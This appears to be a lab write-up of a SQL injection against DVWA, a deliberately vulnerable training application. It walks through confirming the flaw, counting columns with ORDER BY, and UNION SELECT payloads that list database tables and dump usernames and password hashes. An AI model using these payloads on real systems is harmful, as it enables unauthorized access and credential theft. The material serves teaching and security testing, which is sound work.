Code audit: SELECT first_name, last_name FROM users WHERE user_id = '$id'
$id comes straight from the request and is concatenated into the string literal, so a single quote in the input ends the literal and everything after it is parsed as SQL.
I. Confirming the SQL injection:
Input 1' and 1=1# turns the query into:
SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#'
The injected quote closes the string and # comments out the original trailing quote, so the query is still valid and user 1 is returned as normal.
Input 1' and 1=2# builds the same query with a false condition, and nothing is returned. Two different responses to two syntactically valid inputs show that the input is being evaluated as SQL, not treated as data.
(When the id is sent in the URL, encode # as %23; otherwise the browser treats it as a fragment and never sends it to the server.)
II. Exploiting the SQL injection:
1. Finding the number of columns:
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1#'
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 2#'
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 3#'
order by 3 raises an error, so the original SELECT returns exactly two columns. A UNION SELECT must return the same number of columns, so every payload below selects two values.
2. Union query
First read the database user and the current database name:
SELECT first_name, last_name FROM users WHERE user_id = '1' union select user(),database()#'
Input: 1' union select user(),database()#
The two values come back in the first_name and last_name positions of the page output.
3. Union query listing the tables:
SELECT first_name, last_name FROM users WHERE user_id = '1' union select table_name,table_schema from information_schema.tables where table_schema = 'dvwa' #'
This returns every table name in the dvwa database alongside its schema name; users is the one to go after.
4. Union query pulling the data:
SELECT first_name, last_name FROM users WHERE user_id = '1' union select user,password from users#'
This returns the user and password columns of every row in users. DVWA stores the passwords as unsalted MD5 hashes, so they still have to be cracked offline.